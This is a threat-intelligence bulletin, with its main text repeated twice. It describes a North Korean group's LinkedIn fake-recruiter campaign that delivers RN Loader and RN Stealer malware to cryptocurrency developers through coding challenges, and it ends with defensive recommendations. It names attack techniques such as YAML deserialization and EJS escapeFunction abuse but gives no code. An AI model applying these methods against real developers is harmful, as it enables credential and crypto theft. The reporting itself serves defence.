North Korean Hackers Exploit LinkedIn to Infect Crypto Developers with Infostealers
Summary:
The North Korean state-sponsored group known as Slow Pisces (also tracked as Jade Sleet, TraderTraitor, or PUKCHONG) has launched a sophisticated cyber campaign targeting cryptocurrency developers, with the goal of generating revenue for the DPRK regime. This campaign, attributed to significant cryptocurrency heists including the $308 million theft from a Japanese exchange in December 2024 and a suspected $1.5 billion theft from a Dubai platform, relies heavily on social engineering and precision malware delivery.
Slow Pisces initiates contact through LinkedIn, posing as recruiters to lure developers into completing coding challenges. These challenges are delivered via PDFs and GitHub repositories, appearing as job application tasks but secretly embedding malware in Python or JavaScript projects. The malware, named RN Loader and RN Stealer, infects the victim’s system once they execute the provided code. These projects often pull data from both legitimate and attacker-controlled sources, helping the malware blend in with normal activity.
In the Python variant of the campaign, the malware uses YAML deserialization to discreetly execute code, bypassing common detection mechanisms. The RN Loader stage initiates a command loop with a command-and-control server, exfiltrating basic information and downloading follow-up payloads based on the victim’s environment. RN Stealer then collects detailed system data—including saved credentials, cloud configuration files, and SSH keys, specifically from macOS systems. These details help the attackers decide whether to maintain persistent access or terminate the malware, which resides only in memory and leaves minimal forensic evidence. JavaScript-based attacks follow a similar structure, with EJS templating exploited to execute malicious code using the escapeFunction parameter. Though the full JS payload has not been recovered, it is believed to drop and execute Base64-encoded scripts stored locally, within hidden directories.
Security Officer Comments:
The attackers carefully validate their targets before delivering any payloads, using techniques such as geolocation, IP filtering, and browser headers. Their infrastructure mimics legitimate domains, often using subdomains like .api or .cdn to evade suspicion. Palo Alto Networks has worked with GitHub and LinkedIn to disrupt the campaign by removing accounts and repositories involved in the operation. While the tactics of impersonating recruiters and using fake coding challenges are not entirely new, other DPRK groups like Alluring Pisces have used similar lures, Slow Pisces demonstrates a heightened level of operational security. Their payloads are memory-resident, selectively deployed, and protected by multi-layered delivery techniques. This makes detection and prevention far more challenging, especially for organizations operating in the cryptocurrency space.
Suggested Corrections:
IOCs:
https://unit42.paloaltonetworks.com/slow-pisces-new-custom-malware/
Source
https://www.infosecurity-magazine.com/news/north-korea-hackers-linkedin/
The North Korean state-sponsored group known as Slow Pisces (also tracked as Jade Sleet, TraderTraitor, or PUKCHONG) has launched a sophisticated cyber campaign targeting cryptocurrency developers, with the goal of generating revenue for the DPRK regime. This campaign, attributed to significant cryptocurrency heists including the $308 million theft from a Japanese exchange in December 2024 and a suspected $1.5 billion theft from a Dubai platform, relies heavily on social engineering and precision malware delivery.
Slow Pisces initiates contact through LinkedIn, posing as recruiters to lure developers into completing coding challenges. These challenges are delivered via PDFs and GitHub repositories, appearing as job application tasks but secretly embedding malware in Python or JavaScript projects. The malware, named RN Loader and RN Stealer, infects the victim’s system once they execute the provided code. These projects often pull data from both legitimate and attacker-controlled sources, helping the malware blend in with normal activity.
In the Python variant of the campaign, the malware uses YAML deserialization to discreetly execute code, bypassing common detection mechanisms. The RN Loader stage initiates a command loop with a command-and-control server, exfiltrating basic information and downloading follow-up payloads based on the victim’s environment. RN Stealer then collects detailed system data—including saved credentials, cloud configuration files, and SSH keys, specifically from macOS systems. These details help the attackers decide whether to maintain persistent access or terminate the malware, which resides only in memory and leaves minimal forensic evidence. JavaScript-based attacks follow a similar structure, with EJS templating exploited to execute malicious code using the escapeFunction parameter. Though the full JS payload has not been recovered, it is believed to drop and execute Base64-encoded scripts stored locally, within hidden directories.
Security Officer Comments:
The attackers carefully validate their targets before delivering any payloads, using techniques such as geolocation, IP filtering, and browser headers. Their infrastructure mimics legitimate domains, often using subdomains like .api or .cdn to evade suspicion. Palo Alto Networks has worked with GitHub and LinkedIn to disrupt the campaign by removing accounts and repositories involved in the operation. While the tactics of impersonating recruiters and using fake coding challenges are not entirely new, other DPRK groups like Alluring Pisces have used similar lures, Slow Pisces demonstrates a heightened level of operational security. Their payloads are memory-resident, selectively deployed, and protected by multi-layered delivery techniques. This makes detection and prevention far more challenging, especially for organizations operating in the cryptocurrency space.
Suggested Corrections:
IOCs:
https://unit42.paloaltonetworks.com/slow-pisces-new-custom-malware/
- Educate Developers – Warn against job scams and suspicious coding challenges from unknown contacts on LinkedIn or GitHub.
- Block Unvetted Code Execution – Require code from external sources to be reviewed or sandboxed before running.
- Monitor Network and Memory Activity – Use EDR and DNS/HTTPS inspection to detect in-memory malware and suspicious C2 traffic.
- Apply GitHub and LinkedIn Controls: Limit repo access, monitor for unusual forks, and report fake recruiter profiles.
Source
https://www.infosecurity-magazine.com/news/north-korea-hackers-linkedin/